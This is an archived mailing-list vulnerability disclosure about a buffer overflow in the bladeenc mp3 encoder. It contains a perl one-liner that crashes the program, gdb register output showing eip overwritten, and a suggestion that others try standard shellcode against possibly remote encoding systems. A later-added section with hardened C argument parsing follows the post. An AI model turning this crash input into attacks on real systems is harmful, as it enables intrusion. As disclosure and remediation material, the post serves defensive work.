Hello everybody,

Some time ago I discovered a buffer overflow vulnerability in bladeenc. Bladeenc is an open source mp3 encoder, widely used under linux. The program segfaults when a large string is given as argument on program startup. Under normal conditions, the syntax of bladeenc is like:

bladeenc filename.wav

If you replace 'filename.wav' with a large string (around 300 chars), bladeenc crashes, overwriting %eip. Also, other options which can be specified through argv[] can be exploited too. (I guess that the problem can be found in the argument parsing functions of the program - I didn't have much time to investigate the source, but a brief grep strcpy of the source gives a few lines of output which may be useful.)

Below is a shot of what happens:

[pesho@dingo stack]$ bladeenc `perl -e "print 'a' x 300"`
Segmentation fault (core dumped)
[pesho@dingo stack]$ gdb bladeenc core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
........
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb) info reg
eax            0x41414141       1094795585
ecx            0x12c            300
edx            0xbffffa00       -1073743360
ebx            0x41414141       1094795585
esp            0xbfffe470       0xbfffe470
ebp            0x41414141       0x41414141      <---
esi            0x41414141       1094795585      <---
edi            0x41414141       1094795585      <---
eip            0x41414141       0x41414141      <--- here we are ...
eflags         0x10216          66070
cs             0x23             35
ss             0x2b             43
ds             0x2b             43
es             0x2b             43
fs             0x2b             43
gs             0x2b             43
fctrl          0x37f            895
fstat          0x0              0
ftag           0xffff           65535
fiseg          0x23             35
fioff          0x804a34a        134521674
foseg          0x2b             43
fooff          0xbfffe4d8       -1073748776
fop            0x59d            1437
(gdb)

So, as you see, the overflow is exploitable. I am not going to post an exploit to it, although very basic standard shellcode works against it. The overflow isn't really a security hole, since the binary isn't setuid. However, looking around with google, there are a few systems that use bladeenc for some kind of 'distributed mp3 encoding'. They apparently consist of different daemons exchanging parts of audio and encoding them with bladeenc.

There are a few of those systems that could possibly be exploited (and probably REMOTELY) using this overflow. Maybe someone on the list would like to test such systems and do some more research on the 'vulnerability'. For people who would like to test, standard shellcode from 'smashing the stack ...' should do the job.

The author was informed around two months ago - no answer received. At the time of the tests, the last stable version was still vulnerable - I don't know if the version has changed since.

Thank you all.

Peter

--
------------------------------------------------------------------
Peter Boutzev                        Ubizen (Luxembourg)
Security Engineer                    We Secure e-Business
Phone +352 26 31 05 85               http://www.ubizen.com
Fax   +352 26 31 05 86
------------------------------------------------------------------

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

mQGiBDpxOmQRBACXNyC+kUQ5vpB33ogP+AERWaDmN67MDAhHCnD/BOCrRIII/3a5
tMuNOM7ZaxB4WzLuh22D3W4qZ+hiyT4YmPZY3Bp5BPlk9sw9edg4lA2vAVyUZTFP
7Vth30IPVv1ZKQzLjbCqWhcifogBnfa2bSK7zDdtGopyqxrAquGzidKZWwCg0jTJ
L5dxS7X1bRSuOvzfshAgkc0D/3/A4FZ8H96muARXzK2UmcTiZCMiqljeMqRVj5EF
n9h1+YpnztKol4Aet1Jzc5NAkWdKJekWeEtD+o1PPMIk8JqznxeJKNvEz3w7GXkc
ev3NlD1CE/vmOjVY3HL+vuy7roi0s9JjlR8Vx8PUGB33XkExyDV5hwwu5FvhWbBc
CYwEA/9QnoEen3atWc4f68ybkOHK5SwVPsJAMCopcrxDZLi/Zeb5t089m/GBQuwx
k/r3CAZsFNE9MfxlRI4pqGQIM0i181XMrWhWCd94Oye6ZtZwld4lLhj63G79mGwA
gTstI5wN8CjLKGPMXBMekbRKZF9cFmQyMg59zIDxvsPxRRfNqLRRUGV0ZXIgQm91
dHpldiAoU2VjdXJpdHkgRW5naW5lZXIsIFViaXplbiAtIEx1eGVtYm91cmcpIDxw
ZXRlci5ib3V0emV2QHViaXplbi5jb20+iFYEExECABYFAjpxOmQECwoEAwMVAwID
FgIBAheAAAoJEBsz1EGWGSGhIz8An1pkbyiaT7ro0w2e+Nzfrmim2i4dAJ44gYu5
d2fWx/zPaEmjPL5teL3stbkCDQQ6cTqEEAgAoztHrJYizUxHMZn+PLGBLR1IX8ox
3KLnADxcMRPTnFdckdI/2ri9/Khdx7X9Pq29vN9Tr6/DBu0wneje3xizuTOi18Ho
PHlTYQEvacJgvpYVWdkDMOPqSYD3/0uPV5k2Ei9fUuw9Sh5iykWzwMMWeZHLjXVf
hBEM1VhXPxxnW6KmpLfw1LH8Zso/CWSdXtnwPfApY/GfHFtowicg9aPCgnCKfG6T
/rRMlZJPCt8ViZ+2yH6GvVb/P1a9+VPjN1WpRCeaKDai/UYBMTT/Zm5dPa55pVOe
cqKYYygYeG8Tm3COA28PUlongS26atUhUuESFL5j5+DDkbxYUwLcNJ3vLwADBQf/
eB904eWKB19K0JNG3/KBS40KLNJ5wKgRrEpo9pWXJajMaLy2lJStMh4ZxOuklKvJ
A+c8cZIw+D6fC2SHuyL2vTN76cCgLYAk82pbvJuYFWOBOqJhzMfTIp31phcAlqaA
gDiG2yUFnxJ8QnbTLNYvbisT964ehPN3bQkRDAkEUZHl6EK7K/gu8HNDp0/wcSxR
BSKfrFbSK/iVlBbhKBWjKXx5B3pzfoqu0pTTqIZ4u1At9d81jKkTpIKELIVMLsoP
eXxL7quSmKW5GHUi0e2t9LBKZLHkAQ9GsEKyn3wDgQpX2UoI3wMjSsRs/jv0FxRp
7+pgtVEDkq891VFP2v0MzohGBBgRAgAGBQI6cTqEAAoJEBsz1EGWGSGhuuEAn2Rc
Q/Uo5rUScmLD4rJkCVUKomREAJ9i34KDIjrHXnw6R2pU21+INRetUA==
=uLhC
-----END PGP PUBLIC KEY BLOCK-----
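Added example (editor's note, not part of the post above and not bladeenc's own source): the report attributes the crash to an unbounded strcpy() of argv[] strings into a fixed buffer in the argument parser. The program below shows the hardened form of that pattern for a hypothetical "bladeenc filename.wav" parser: every argument is bounds-checked against its destination buffer before it is copied, so a 300-character argument is rejected with an error instead of overwriting the stack frame. The buffer size ARG_BUF_SIZE, the struct encoder_opts layout and the parse_args() interface are assumptions made for the example; the 300-byte input is constructed in demo_overlong_argument() to mirror the perl one-liner in the report.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the fixed buffer a hypothetical argument parser copies
 * argv[] strings into (not a value taken from bladeenc). */
#define ARG_BUF_SIZE 256

/* The defect pattern the report describes, shown only as a comment so it
 * is never executed:
 *
 *     char name[ARG_BUF_SIZE];
 *     strcpy(name, argv[1]);   -- a 300-byte argv[1] runs past the buffer
 *                                 and overwrites the saved registers/eip
 */

/* Hardened copy: place arg into dst only if it fits together with its
 * terminating NUL. Returns 1 on success, 0 if the argument was rejected. */
int copy_arg_checked(char *dst, size_t dst_size, const char *arg)
{
    if (dst_size == 0) return 0;
    /* Search for the terminator within the first dst_size bytes only, so an
     * overlong argument is detected before anything is written. */
    const char *end = memchr(arg, '\0', dst_size);
    if (end == NULL) return 0;               /* strlen(arg) >= dst_size */
    memcpy(dst, arg, (size_t)(end - arg) + 1);
    return 1;
}

/* Hypothetical option block for the "bladeenc filename.wav" form. */
struct encoder_opts {
    char input[ARG_BUF_SIZE];
};

/* Fill opts from argv, rejecting any argument that would overflow its
 * buffer. Returns 0 on success, -1 on usage error, -2 if an argument is
 * too long. */
int parse_args(int argc, char **argv, struct encoder_opts *opts)
{
    if (argc < 2) return -1;
    if (!copy_arg_checked(opts->input, sizeof opts->input, argv[1]))
        return -2;
    return 0;
}

/* Self-check with a constructed 300 x 'a' argument, as in the report:
 * the parser must refuse it (returns -2) rather than crash. */
int demo_overlong_argument(void)
{
    static char big[301];
    memset(big, 'a', 300);
    big[300] = '\0';
    char *argv[] = { "bladeenc", big, NULL };
    struct encoder_opts opts;
    return parse_args(2, argv, &opts);
}

/* Self-check with an ordinary filename: accepted and copied intact
 * (returns 1). */
int demo_normal_argument(void)
{
    char *argv[] = { "bladeenc", "song.wav", NULL };
    struct encoder_opts opts;
    if (parse_args(2, argv, &opts) != 0) return 0;
    return strcmp(opts.input, "song.wav") == 0;
}

int main(int argc, char **argv)
{
    struct encoder_opts opts;
    int rc = parse_args(argc, argv, &opts);
    if (rc == -1) {
        fprintf(stderr, "usage: %s filename.wav\n", argv[0]);
        return 1;
    }
    if (rc == -2) {
        fprintf(stderr, "argument too long (max %d chars)\n", ARG_BUF_SIZE - 1);
        return 1;
    }
    printf("input file: %s\n", opts.input);
    return 0;
}
```

The check uses memchr() bounded by the destination size instead of strlen() so that even a pathologically long argument costs at most dst_size bytes of scanning; the same helper can guard every other argv[] option the report mentions, since each one is copied through the same bounded path.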
This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 22:27:59 PST